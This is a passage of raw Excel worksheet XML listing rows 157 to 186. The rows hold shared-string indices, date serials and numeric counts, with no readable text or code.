        <v>290</v>
      </c>
      <c r="N157" t="s">
        <v>291</v>
      </c>
      <c r="O157" t="s">
        <v>2973</v>
      </c>
      <c r="P157" t="s">
        <v>250</v>
      </c>
      <c r="Q157" t="s">
        <v>3672</v>
      </c>
      <c r="R157">
        <v>4088</v>
      </c>
      <c r="S157">
        <v>2553</v>
      </c>
      <c r="T157">
        <v>10750</v>
      </c>
      <c r="U157">
        <v>5247</v>
      </c>
      <c r="V157">
        <v>4679</v>
      </c>
      <c r="W157" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="158" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A158" t="s">
        <v>3</v>
      </c>
      <c r="B158">
        <v>43764.136447372686</v>
      </c>
      <c r="C158" t="s">
        <v>3199</v>
      </c>
      <c r="D158">
        <v>173</v>
      </c>
      <c r="E158" t="s">
        <v>3200</v>
      </c>
      <c r="F158">
        <v>110</v>
      </c>
      <c r="G158" t="s">
        <v>3201</v>
      </c>
      <c r="H158" t="s">
        <v>2972</v>
      </c>
      <c r="I158" t="s">
        <v>268</v>
      </c>
      <c r="J158" t="s">
        <v>269</v>
      </c>
      <c r="K158" t="s">
        <v>10</v>
      </c>
      <c r="L158" t="s">
        <v>77</v>
      </c>
      <c r="M158" t="s">
        <v>290</v>
      </c>
      <c r="N158" t="s">
        <v>291</v>
      </c>
      <c r="O158" t="s">
        <v>2973</v>
      </c>
      <c r="Q158" t="s">
        <v>3673</v>
      </c>
      <c r="R158">
        <v>4088</v>
      </c>
      <c r="S158">
        <v>2553</v>
      </c>
      <c r="T158">
        <v>10750</v>
      </c>
      <c r="U158">
        <v>5247</v>
      </c>
      <c r="V158">
        <v>4679</v>
      </c>
      <c r="W158" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="159" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A159" t="s">
        <v>3</v>
      </c>
      <c r="B159">
        <v>44019.157665162034</v>
      </c>
      <c r="C159" t="s">
        <v>3204</v>
      </c>
      <c r="D159">
        <v>102</v>
      </c>
      <c r="E159" t="s">
        <v>3205</v>
      </c>
      <c r="F159">
        <v>102</v>
      </c>
      <c r="G159" t="s">
        <v>3206</v>
      </c>
      <c r="H159" t="s">
        <v>3207</v>
      </c>
      <c r="I159" t="s">
        <v>185</v>
      </c>
      <c r="J159" t="s">
        <v>542</v>
      </c>
      <c r="K159" t="s">
        <v>21</v>
      </c>
      <c r="L159" t="s">
        <v>77</v>
      </c>
      <c r="N159" t="s">
        <v>3208</v>
      </c>
      <c r="O159" t="s">
        <v>3209</v>
      </c>
      <c r="P159" t="s">
        <v>1812</v>
      </c>
      <c r="Q159" t="s">
        <v>3674</v>
      </c>
      <c r="R159">
        <v>208181</v>
      </c>
      <c r="S159">
        <v>143732</v>
      </c>
      <c r="T159">
        <v>942430</v>
      </c>
      <c r="U159">
        <v>1754325</v>
      </c>
      <c r="V159">
        <v>1853012</v>
      </c>
      <c r="W159" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="160" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A160" t="s">
        <v>3</v>
      </c>
      <c r="B160">
        <v>44155.753830057867</v>
      </c>
      <c r="C160" t="s">
        <v>3103</v>
      </c>
      <c r="D160">
        <v>102</v>
      </c>
      <c r="E160" t="s">
        <v>3211</v>
      </c>
      <c r="F160">
        <v>102</v>
      </c>
      <c r="G160" t="s">
        <v>3212</v>
      </c>
      <c r="H160" t="s">
        <v>2723</v>
      </c>
      <c r="I160" t="s">
        <v>75</v>
      </c>
      <c r="J160" t="s">
        <v>76</v>
      </c>
      <c r="K160" t="s">
        <v>21</v>
      </c>
      <c r="L160" t="s">
        <v>77</v>
      </c>
      <c r="M160" t="s">
        <v>2703</v>
      </c>
      <c r="Q160" t="s">
        <v>3107</v>
      </c>
      <c r="R160">
        <v>68114</v>
      </c>
      <c r="S160">
        <v>53184</v>
      </c>
      <c r="T160">
        <v>360742</v>
      </c>
      <c r="U160">
        <v>579398</v>
      </c>
      <c r="V160">
        <v>725758</v>
      </c>
      <c r="W160" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="161" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A161" t="s">
        <v>3</v>
      </c>
      <c r="B161">
        <v>44130.739603888891</v>
      </c>
      <c r="C161" t="s">
        <v>3213</v>
      </c>
      <c r="D161">
        <v>112</v>
      </c>
      <c r="E161" t="s">
        <v>3214</v>
      </c>
      <c r="F161">
        <v>102</v>
      </c>
      <c r="G161" t="s">
        <v>3215</v>
      </c>
      <c r="H161" t="s">
        <v>3216</v>
      </c>
      <c r="I161" t="s">
        <v>156</v>
      </c>
      <c r="J161" t="s">
        <v>301</v>
      </c>
      <c r="K161" t="s">
        <v>26</v>
      </c>
      <c r="L161" t="s">
        <v>77</v>
      </c>
      <c r="M161" t="s">
        <v>475</v>
      </c>
      <c r="N161" t="s">
        <v>476</v>
      </c>
      <c r="Q161" t="s">
        <v>1325</v>
      </c>
      <c r="R161">
        <v>1</v>
      </c>
      <c r="S161">
        <v>1</v>
      </c>
      <c r="W161" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="162" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A162" t="s">
        <v>3</v>
      </c>
      <c r="B162">
        <v>44145.612867685188</v>
      </c>
      <c r="C162" t="s">
        <v>3217</v>
      </c>
      <c r="D162">
        <v>122</v>
      </c>
      <c r="E162" t="s">
        <v>3218</v>
      </c>
      <c r="F162">
        <v>102</v>
      </c>
      <c r="G162" t="s">
        <v>3219</v>
      </c>
      <c r="H162" t="s">
        <v>3220</v>
      </c>
      <c r="I162" t="s">
        <v>156</v>
      </c>
      <c r="J162" t="s">
        <v>301</v>
      </c>
      <c r="K162" t="s">
        <v>26</v>
      </c>
      <c r="L162" t="s">
        <v>77</v>
      </c>
      <c r="M162" t="s">
        <v>475</v>
      </c>
      <c r="N162" t="s">
        <v>476</v>
      </c>
      <c r="Q162" t="s">
        <v>1325</v>
      </c>
      <c r="R162">
        <v>116</v>
      </c>
      <c r="S162">
        <v>128</v>
      </c>
      <c r="W162" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="163" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A163" t="s">
        <v>3</v>
      </c>
      <c r="B163">
        <v>43977.603855960646</v>
      </c>
      <c r="C163" t="s">
        <v>3217</v>
      </c>
      <c r="D163">
        <v>122</v>
      </c>
      <c r="E163" t="s">
        <v>3221</v>
      </c>
      <c r="F163">
        <v>101</v>
      </c>
      <c r="G163" t="s">
        <v>3222</v>
      </c>
      <c r="H163" t="s">
        <v>3223</v>
      </c>
      <c r="I163" t="s">
        <v>156</v>
      </c>
      <c r="J163" t="s">
        <v>301</v>
      </c>
      <c r="K163" t="s">
        <v>26</v>
      </c>
      <c r="L163" t="s">
        <v>77</v>
      </c>
      <c r="M163" t="s">
        <v>475</v>
      </c>
      <c r="N163" t="s">
        <v>476</v>
      </c>
      <c r="Q163" t="s">
        <v>1325</v>
      </c>
      <c r="R163">
        <v>14</v>
      </c>
      <c r="S163">
        <v>10</v>
      </c>
      <c r="W163" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="164" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A164" t="s">
        <v>3</v>
      </c>
      <c r="B164">
        <v>43977.603855983798</v>
      </c>
      <c r="C164" t="s">
        <v>3217</v>
      </c>
      <c r="D164">
        <v>122</v>
      </c>
      <c r="E164" t="s">
        <v>3224</v>
      </c>
      <c r="F164">
        <v>101</v>
      </c>
      <c r="G164" t="s">
        <v>3225</v>
      </c>
      <c r="H164" t="s">
        <v>3226</v>
      </c>
      <c r="I164" t="s">
        <v>156</v>
      </c>
      <c r="J164" t="s">
        <v>301</v>
      </c>
      <c r="K164" t="s">
        <v>26</v>
      </c>
      <c r="L164" t="s">
        <v>77</v>
      </c>
      <c r="M164" t="s">
        <v>475</v>
      </c>
      <c r="N164" t="s">
        <v>476</v>
      </c>
      <c r="Q164" t="s">
        <v>1325</v>
      </c>
      <c r="R164">
        <v>112</v>
      </c>
      <c r="S164">
        <v>128</v>
      </c>
      <c r="W164" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="165" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A165" t="s">
        <v>3</v>
      </c>
      <c r="B165">
        <v>44145.612867743053</v>
      </c>
      <c r="C165" t="s">
        <v>3217</v>
      </c>
      <c r="D165">
        <v>122</v>
      </c>
      <c r="E165" t="s">
        <v>3227</v>
      </c>
      <c r="F165">
        <v>103</v>
      </c>
      <c r="G165" t="s">
        <v>3228</v>
      </c>
      <c r="H165" t="s">
        <v>3229</v>
      </c>
      <c r="I165" t="s">
        <v>156</v>
      </c>
      <c r="J165" t="s">
        <v>301</v>
      </c>
      <c r="K165" t="s">
        <v>26</v>
      </c>
      <c r="L165" t="s">
        <v>77</v>
      </c>
      <c r="M165" t="s">
        <v>475</v>
      </c>
      <c r="N165" t="s">
        <v>476</v>
      </c>
      <c r="Q165" t="s">
        <v>1325</v>
      </c>
      <c r="R165">
        <v>49</v>
      </c>
      <c r="S165">
        <v>39</v>
      </c>
      <c r="W165" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="166" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A166" t="s">
        <v>3</v>
      </c>
      <c r="B166">
        <v>43977.603856006943</v>
      </c>
      <c r="C166" t="s">
        <v>3217</v>
      </c>
      <c r="D166">
        <v>122</v>
      </c>
      <c r="E166" t="s">
        <v>3230</v>
      </c>
      <c r="F166">
        <v>100</v>
      </c>
      <c r="G166" t="s">
        <v>3231</v>
      </c>
      <c r="H166" t="s">
        <v>3232</v>
      </c>
      <c r="I166" t="s">
        <v>156</v>
      </c>
      <c r="J166" t="s">
        <v>301</v>
      </c>
      <c r="K166" t="s">
        <v>26</v>
      </c>
      <c r="L166" t="s">
        <v>77</v>
      </c>
      <c r="M166" t="s">
        <v>475</v>
      </c>
      <c r="N166" t="s">
        <v>476</v>
      </c>
      <c r="Q166" t="s">
        <v>1325</v>
      </c>
      <c r="S166">
        <v>1</v>
      </c>
      <c r="W166" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="167" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A167" t="s">
        <v>3</v>
      </c>
      <c r="B167">
        <v>44132.612051087963</v>
      </c>
      <c r="C167" t="s">
        <v>3233</v>
      </c>
      <c r="D167">
        <v>144</v>
      </c>
      <c r="E167" t="s">
        <v>3234</v>
      </c>
      <c r="F167">
        <v>102</v>
      </c>
      <c r="G167" t="s">
        <v>3235</v>
      </c>
      <c r="H167" t="s">
        <v>3236</v>
      </c>
      <c r="I167" t="s">
        <v>172</v>
      </c>
      <c r="J167" t="s">
        <v>173</v>
      </c>
      <c r="K167" t="s">
        <v>13</v>
      </c>
      <c r="L167" t="s">
        <v>83</v>
      </c>
      <c r="M167" t="s">
        <v>72</v>
      </c>
      <c r="O167" t="s">
        <v>3237</v>
      </c>
      <c r="P167" t="s">
        <v>951</v>
      </c>
      <c r="Q167" t="s">
        <v>3675</v>
      </c>
      <c r="W167" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="168" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A168" t="s">
        <v>3</v>
      </c>
      <c r="B168">
        <v>44123.591835520834</v>
      </c>
      <c r="C168" t="s">
        <v>3233</v>
      </c>
      <c r="D168">
        <v>144</v>
      </c>
      <c r="E168" t="s">
        <v>3239</v>
      </c>
      <c r="F168">
        <v>101</v>
      </c>
      <c r="G168" t="s">
        <v>3240</v>
      </c>
      <c r="H168" t="s">
        <v>412</v>
      </c>
      <c r="I168" t="s">
        <v>172</v>
      </c>
      <c r="J168" t="s">
        <v>173</v>
      </c>
      <c r="K168" t="s">
        <v>13</v>
      </c>
      <c r="L168" t="s">
        <v>77</v>
      </c>
      <c r="M168" t="s">
        <v>406</v>
      </c>
      <c r="N168" t="s">
        <v>407</v>
      </c>
      <c r="Q168" t="s">
        <v>3675</v>
      </c>
      <c r="W168" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="169" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A169" t="s">
        <v>3</v>
      </c>
      <c r="B169">
        <v>44139.372962187503</v>
      </c>
      <c r="C169" t="s">
        <v>3233</v>
      </c>
      <c r="D169">
        <v>144</v>
      </c>
      <c r="E169" t="s">
        <v>3241</v>
      </c>
      <c r="F169">
        <v>102</v>
      </c>
      <c r="G169" t="s">
        <v>3242</v>
      </c>
      <c r="H169" t="s">
        <v>416</v>
      </c>
      <c r="I169" t="s">
        <v>172</v>
      </c>
      <c r="J169" t="s">
        <v>173</v>
      </c>
      <c r="K169" t="s">
        <v>13</v>
      </c>
      <c r="L169" t="s">
        <v>77</v>
      </c>
      <c r="M169" t="s">
        <v>406</v>
      </c>
      <c r="N169" t="s">
        <v>407</v>
      </c>
      <c r="Q169" t="s">
        <v>3675</v>
      </c>
      <c r="W169" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="170" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A170" t="s">
        <v>3</v>
      </c>
      <c r="B170">
        <v>44132.612051122684</v>
      </c>
      <c r="C170" t="s">
        <v>3233</v>
      </c>
      <c r="D170">
        <v>144</v>
      </c>
      <c r="E170" t="s">
        <v>3243</v>
      </c>
      <c r="F170">
        <v>101</v>
      </c>
      <c r="G170" t="s">
        <v>3244</v>
      </c>
      <c r="H170" t="s">
        <v>419</v>
      </c>
      <c r="I170" t="s">
        <v>172</v>
      </c>
      <c r="J170" t="s">
        <v>173</v>
      </c>
      <c r="K170" t="s">
        <v>13</v>
      </c>
      <c r="L170" t="s">
        <v>77</v>
      </c>
      <c r="M170" t="s">
        <v>406</v>
      </c>
      <c r="N170" t="s">
        <v>407</v>
      </c>
      <c r="Q170" t="s">
        <v>3675</v>
      </c>
      <c r="W170" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="171" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A171" t="s">
        <v>3</v>
      </c>
      <c r="B171">
        <v>44126.700148321761</v>
      </c>
      <c r="C171" t="s">
        <v>3233</v>
      </c>
      <c r="D171">
        <v>144</v>
      </c>
      <c r="E171" t="s">
        <v>3245</v>
      </c>
      <c r="F171">
        <v>101</v>
      </c>
      <c r="G171" t="s">
        <v>3246</v>
      </c>
      <c r="H171" t="s">
        <v>422</v>
      </c>
      <c r="I171" t="s">
        <v>172</v>
      </c>
      <c r="J171" t="s">
        <v>173</v>
      </c>
      <c r="K171" t="s">
        <v>13</v>
      </c>
      <c r="L171" t="s">
        <v>77</v>
      </c>
      <c r="M171" t="s">
        <v>406</v>
      </c>
      <c r="N171" t="s">
        <v>407</v>
      </c>
      <c r="Q171" t="s">
        <v>3675</v>
      </c>
      <c r="T171">
        <v>5271</v>
      </c>
      <c r="U171">
        <v>7652</v>
      </c>
      <c r="W171" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="172" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A172" t="s">
        <v>3</v>
      </c>
      <c r="B172">
        <v>44123.591835578707</v>
      </c>
      <c r="C172" t="s">
        <v>3233</v>
      </c>
      <c r="D172">
        <v>144</v>
      </c>
      <c r="E172" t="s">
        <v>3247</v>
      </c>
      <c r="F172">
        <v>101</v>
      </c>
      <c r="G172" t="s">
        <v>3248</v>
      </c>
      <c r="H172" t="s">
        <v>426</v>
      </c>
      <c r="I172" t="s">
        <v>172</v>
      </c>
      <c r="J172" t="s">
        <v>173</v>
      </c>
      <c r="K172" t="s">
        <v>13</v>
      </c>
      <c r="L172" t="s">
        <v>77</v>
      </c>
      <c r="M172" t="s">
        <v>406</v>
      </c>
      <c r="N172" t="s">
        <v>407</v>
      </c>
      <c r="Q172" t="s">
        <v>3675</v>
      </c>
      <c r="W172" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="173" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A173" t="s">
        <v>3</v>
      </c>
      <c r="B173">
        <v>44139.372962199071</v>
      </c>
      <c r="C173" t="s">
        <v>3233</v>
      </c>
      <c r="D173">
        <v>144</v>
      </c>
      <c r="E173" t="s">
        <v>3249</v>
      </c>
      <c r="F173">
        <v>102</v>
      </c>
      <c r="G173" t="s">
        <v>3250</v>
      </c>
      <c r="H173" t="s">
        <v>430</v>
      </c>
      <c r="I173" t="s">
        <v>172</v>
      </c>
      <c r="J173" t="s">
        <v>173</v>
      </c>
      <c r="K173" t="s">
        <v>13</v>
      </c>
      <c r="L173" t="s">
        <v>77</v>
      </c>
      <c r="M173" t="s">
        <v>406</v>
      </c>
      <c r="N173" t="s">
        <v>407</v>
      </c>
      <c r="Q173" t="s">
        <v>3675</v>
      </c>
      <c r="W173" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="174" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A174" t="s">
        <v>3</v>
      </c>
      <c r="B174">
        <v>44123.591835555555</v>
      </c>
      <c r="C174" t="s">
        <v>3233</v>
      </c>
      <c r="D174">
        <v>144</v>
      </c>
      <c r="E174" t="s">
        <v>3251</v>
      </c>
      <c r="F174">
        <v>101</v>
      </c>
      <c r="G174" t="s">
        <v>3252</v>
      </c>
      <c r="H174" t="s">
        <v>433</v>
      </c>
      <c r="I174" t="s">
        <v>172</v>
      </c>
      <c r="J174" t="s">
        <v>173</v>
      </c>
      <c r="K174" t="s">
        <v>13</v>
      </c>
      <c r="L174" t="s">
        <v>77</v>
      </c>
      <c r="M174" t="s">
        <v>406</v>
      </c>
      <c r="N174" t="s">
        <v>407</v>
      </c>
      <c r="Q174" t="s">
        <v>3675</v>
      </c>
      <c r="W174" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="175" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A175" t="s">
        <v>3</v>
      </c>
      <c r="B175">
        <v>43907.411483553238</v>
      </c>
      <c r="C175" t="s">
        <v>3253</v>
      </c>
      <c r="D175">
        <v>101</v>
      </c>
      <c r="E175" t="s">
        <v>3254</v>
      </c>
      <c r="F175">
        <v>101</v>
      </c>
      <c r="G175" t="s">
        <v>3255</v>
      </c>
      <c r="H175" t="s">
        <v>527</v>
      </c>
      <c r="I175" t="s">
        <v>528</v>
      </c>
      <c r="J175" t="s">
        <v>529</v>
      </c>
      <c r="K175" t="s">
        <v>39</v>
      </c>
      <c r="L175" t="s">
        <v>83</v>
      </c>
      <c r="M175" t="s">
        <v>72</v>
      </c>
      <c r="Q175" t="s">
        <v>3676</v>
      </c>
      <c r="R175">
        <v>182495</v>
      </c>
      <c r="S175">
        <v>125921</v>
      </c>
      <c r="T175">
        <v>730283</v>
      </c>
      <c r="U175">
        <v>1167112</v>
      </c>
      <c r="V175">
        <v>1166640</v>
      </c>
      <c r="W175" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="176" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A176" t="s">
        <v>3</v>
      </c>
      <c r="B176">
        <v>44095.585860370367</v>
      </c>
      <c r="C176" t="s">
        <v>3253</v>
      </c>
      <c r="D176">
        <v>200</v>
      </c>
      <c r="E176" t="s">
        <v>3254</v>
      </c>
      <c r="F176">
        <v>200</v>
      </c>
      <c r="G176" t="s">
        <v>3255</v>
      </c>
      <c r="H176" t="s">
        <v>527</v>
      </c>
      <c r="I176" t="s">
        <v>528</v>
      </c>
      <c r="J176" t="s">
        <v>529</v>
      </c>
      <c r="K176" t="s">
        <v>39</v>
      </c>
      <c r="L176" t="s">
        <v>83</v>
      </c>
      <c r="M176" t="s">
        <v>72</v>
      </c>
      <c r="P176" t="s">
        <v>530</v>
      </c>
      <c r="Q176" t="s">
        <v>3677</v>
      </c>
      <c r="R176">
        <v>2672</v>
      </c>
      <c r="S176">
        <v>3942</v>
      </c>
      <c r="T176">
        <v>11224</v>
      </c>
      <c r="U176">
        <v>23126</v>
      </c>
      <c r="V176">
        <v>16913</v>
      </c>
      <c r="W176" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="177" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A177" t="s">
        <v>3</v>
      </c>
      <c r="B177">
        <v>44159.674185833333</v>
      </c>
      <c r="C177" t="s">
        <v>3097</v>
      </c>
      <c r="D177">
        <v>160</v>
      </c>
      <c r="E177" t="s">
        <v>3258</v>
      </c>
      <c r="F177">
        <v>140</v>
      </c>
      <c r="G177" t="s">
        <v>3259</v>
      </c>
      <c r="H177" t="s">
        <v>3100</v>
      </c>
      <c r="I177" t="s">
        <v>203</v>
      </c>
      <c r="J177" t="s">
        <v>3101</v>
      </c>
      <c r="K177" t="s">
        <v>16</v>
      </c>
      <c r="L177" t="s">
        <v>83</v>
      </c>
      <c r="M177" t="s">
        <v>72</v>
      </c>
      <c r="Q177" t="s">
        <v>3661</v>
      </c>
      <c r="T177">
        <v>1635</v>
      </c>
      <c r="U177">
        <v>2540</v>
      </c>
      <c r="V177">
        <v>1541</v>
      </c>
      <c r="W177" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="178" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A178" t="s">
        <v>3</v>
      </c>
      <c r="B178">
        <v>43782.06062045139</v>
      </c>
      <c r="C178" t="s">
        <v>3108</v>
      </c>
      <c r="D178">
        <v>121</v>
      </c>
      <c r="E178" t="s">
        <v>3260</v>
      </c>
      <c r="F178">
        <v>101</v>
      </c>
      <c r="G178" t="s">
        <v>3261</v>
      </c>
      <c r="H178" t="s">
        <v>3262</v>
      </c>
      <c r="I178" t="s">
        <v>185</v>
      </c>
      <c r="J178" t="s">
        <v>186</v>
      </c>
      <c r="K178" t="s">
        <v>16</v>
      </c>
      <c r="L178" t="s">
        <v>83</v>
      </c>
      <c r="M178" t="s">
        <v>72</v>
      </c>
      <c r="O178" t="s">
        <v>1390</v>
      </c>
      <c r="P178" t="s">
        <v>1824</v>
      </c>
      <c r="Q178" t="s">
        <v>3662</v>
      </c>
      <c r="R178">
        <v>17915</v>
      </c>
      <c r="S178">
        <v>13548</v>
      </c>
      <c r="T178">
        <v>106570</v>
      </c>
      <c r="U178">
        <v>158841</v>
      </c>
      <c r="V178">
        <v>180854</v>
      </c>
      <c r="W178" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="179" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A179" t="s">
        <v>3</v>
      </c>
      <c r="B179">
        <v>43767.499909386577</v>
      </c>
      <c r="C179" t="s">
        <v>3108</v>
      </c>
      <c r="D179">
        <v>121</v>
      </c>
      <c r="E179" t="s">
        <v>3263</v>
      </c>
      <c r="F179">
        <v>101</v>
      </c>
      <c r="G179" t="s">
        <v>3264</v>
      </c>
      <c r="H179" t="s">
        <v>3265</v>
      </c>
      <c r="I179" t="s">
        <v>611</v>
      </c>
      <c r="J179" t="s">
        <v>612</v>
      </c>
      <c r="K179" t="s">
        <v>14</v>
      </c>
      <c r="L179" t="s">
        <v>77</v>
      </c>
      <c r="M179" t="s">
        <v>612</v>
      </c>
      <c r="N179" t="s">
        <v>613</v>
      </c>
      <c r="O179" t="s">
        <v>2122</v>
      </c>
      <c r="P179" t="s">
        <v>612</v>
      </c>
      <c r="Q179" t="s">
        <v>3662</v>
      </c>
      <c r="T179">
        <v>1749</v>
      </c>
      <c r="U179">
        <v>2539</v>
      </c>
      <c r="V179">
        <v>1545</v>
      </c>
      <c r="W179" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="180" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A180" t="s">
        <v>3</v>
      </c>
      <c r="B180">
        <v>43783.664907627317</v>
      </c>
      <c r="C180" t="s">
        <v>3266</v>
      </c>
      <c r="D180">
        <v>100</v>
      </c>
      <c r="E180" t="s">
        <v>3267</v>
      </c>
      <c r="F180">
        <v>100</v>
      </c>
      <c r="G180" t="s">
        <v>3268</v>
      </c>
      <c r="H180" t="s">
        <v>2388</v>
      </c>
      <c r="I180" t="s">
        <v>31</v>
      </c>
      <c r="J180" t="s">
        <v>262</v>
      </c>
      <c r="K180" t="s">
        <v>31</v>
      </c>
      <c r="L180" t="s">
        <v>77</v>
      </c>
      <c r="M180" t="s">
        <v>262</v>
      </c>
      <c r="N180" t="s">
        <v>263</v>
      </c>
      <c r="Q180" t="s">
        <v>161</v>
      </c>
      <c r="W180" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="181" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A181" t="s">
        <v>3</v>
      </c>
      <c r="B181">
        <v>43783.664907615741</v>
      </c>
      <c r="C181" t="s">
        <v>3266</v>
      </c>
      <c r="D181">
        <v>100</v>
      </c>
      <c r="E181" t="s">
        <v>3269</v>
      </c>
      <c r="F181">
        <v>100</v>
      </c>
      <c r="G181" t="s">
        <v>3270</v>
      </c>
      <c r="H181" t="s">
        <v>1492</v>
      </c>
      <c r="I181" t="s">
        <v>31</v>
      </c>
      <c r="J181" t="s">
        <v>262</v>
      </c>
      <c r="K181" t="s">
        <v>31</v>
      </c>
      <c r="L181" t="s">
        <v>77</v>
      </c>
      <c r="M181" t="s">
        <v>262</v>
      </c>
      <c r="N181" t="s">
        <v>263</v>
      </c>
      <c r="Q181" t="s">
        <v>161</v>
      </c>
      <c r="W181" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="182" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A182" t="s">
        <v>3</v>
      </c>
      <c r="B182">
        <v>44125.826187777777</v>
      </c>
      <c r="C182" t="s">
        <v>3271</v>
      </c>
      <c r="D182">
        <v>110</v>
      </c>
      <c r="E182" t="s">
        <v>3272</v>
      </c>
      <c r="F182">
        <v>110</v>
      </c>
      <c r="G182" t="s">
        <v>3273</v>
      </c>
      <c r="H182" t="s">
        <v>1425</v>
      </c>
      <c r="I182" t="s">
        <v>172</v>
      </c>
      <c r="J182" t="s">
        <v>173</v>
      </c>
      <c r="K182" t="s">
        <v>13</v>
      </c>
      <c r="L182" t="s">
        <v>83</v>
      </c>
      <c r="M182" t="s">
        <v>72</v>
      </c>
      <c r="O182" t="s">
        <v>3274</v>
      </c>
      <c r="Q182" t="s">
        <v>3678</v>
      </c>
      <c r="R182">
        <v>194</v>
      </c>
      <c r="S182">
        <v>62</v>
      </c>
      <c r="W182" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="183" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A183" t="s">
        <v>3</v>
      </c>
      <c r="B183">
        <v>43787.387686284725</v>
      </c>
      <c r="C183" t="s">
        <v>3142</v>
      </c>
      <c r="D183">
        <v>110</v>
      </c>
      <c r="E183" t="s">
        <v>3276</v>
      </c>
      <c r="F183">
        <v>100</v>
      </c>
      <c r="G183" t="s">
        <v>3277</v>
      </c>
      <c r="H183" t="s">
        <v>3278</v>
      </c>
      <c r="I183" t="s">
        <v>75</v>
      </c>
      <c r="J183" t="s">
        <v>76</v>
      </c>
      <c r="K183" t="s">
        <v>15</v>
      </c>
      <c r="L183" t="s">
        <v>83</v>
      </c>
      <c r="M183" t="s">
        <v>90</v>
      </c>
      <c r="N183" t="s">
        <v>221</v>
      </c>
      <c r="O183" t="s">
        <v>3279</v>
      </c>
      <c r="P183" t="s">
        <v>222</v>
      </c>
      <c r="Q183" t="s">
        <v>3667</v>
      </c>
      <c r="R183">
        <v>141850</v>
      </c>
      <c r="S183">
        <v>104322</v>
      </c>
      <c r="T183">
        <v>644396</v>
      </c>
      <c r="U183">
        <v>1004509</v>
      </c>
      <c r="V183">
        <v>1051208</v>
      </c>
      <c r="W183" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="184" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A184" t="s">
        <v>3</v>
      </c>
      <c r="B184">
        <v>43892.685863321756</v>
      </c>
      <c r="C184" t="s">
        <v>3290</v>
      </c>
      <c r="D184">
        <v>100</v>
      </c>
      <c r="E184" t="s">
        <v>3291</v>
      </c>
      <c r="F184">
        <v>100</v>
      </c>
      <c r="G184" t="s">
        <v>3292</v>
      </c>
      <c r="H184" t="s">
        <v>3293</v>
      </c>
      <c r="I184" t="s">
        <v>203</v>
      </c>
      <c r="J184" t="s">
        <v>204</v>
      </c>
      <c r="K184" t="s">
        <v>28</v>
      </c>
      <c r="L184" t="s">
        <v>83</v>
      </c>
      <c r="M184" t="s">
        <v>72</v>
      </c>
      <c r="Q184" t="s">
        <v>2312</v>
      </c>
      <c r="W184" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="185" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A185" t="s">
        <v>3</v>
      </c>
      <c r="B185">
        <v>43907.505775127313</v>
      </c>
      <c r="C185" t="s">
        <v>3296</v>
      </c>
      <c r="D185">
        <v>111</v>
      </c>
      <c r="E185" t="s">
        <v>3297</v>
      </c>
      <c r="F185">
        <v>100</v>
      </c>
      <c r="G185" t="s">
        <v>3298</v>
      </c>
      <c r="H185" t="s">
        <v>3299</v>
      </c>
      <c r="I185" t="s">
        <v>203</v>
      </c>
      <c r="J185" t="s">
        <v>204</v>
      </c>
      <c r="K185" t="s">
        <v>24</v>
      </c>
      <c r="L185" t="s">
        <v>83</v>
      </c>
      <c r="M185" t="s">
        <v>72</v>
      </c>
      <c r="Q185" t="s">
        <v>3661</v>
      </c>
      <c r="R185">
        <v>69</v>
      </c>
      <c r="S185">
        <v>95</v>
      </c>
      <c r="T185">
        <v>488</v>
      </c>
      <c r="U185">
        <v>676</v>
      </c>
      <c r="V185">
        <v>1122</v>
      </c>
      <c r="W185" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="186" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A186" t="s">
        <v>3</v>
      </c>
      <c r="B186">
        <v>44008.481357233795</v>
      </c>
      <c r="C186" t="s">
        <v>3296</v>
